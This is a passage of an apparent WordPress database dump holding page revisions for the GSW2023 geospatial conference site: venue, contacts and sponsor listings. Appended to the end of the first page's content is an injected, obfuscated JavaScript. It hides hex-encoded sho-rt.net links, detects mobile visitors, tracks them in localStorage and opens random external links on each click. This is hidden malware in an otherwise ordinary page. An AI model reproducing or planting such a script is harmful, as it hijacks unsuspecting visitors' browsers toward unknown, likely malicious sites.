12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 00:06:50','2023-08-16 00:06:50','',3066,'https://gsw2023.com/?p=5236',0,'revision','',0),
(5237,1,'2023-08-16 00:07:53','2023-08-16 00:07:53','[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>\r\n\r\n&nbsp;\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_text]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Platinum Sponsors</span></strong></h4>\r\n[vc_row_inner][vc_column_inner width=\"1/2\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n<a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>\r\n\r\n&nbsp;\r\n\r\n[/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692141731943{margin-top: -15px !important;}\"][vc_row][vc_column][vc_column_text]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" 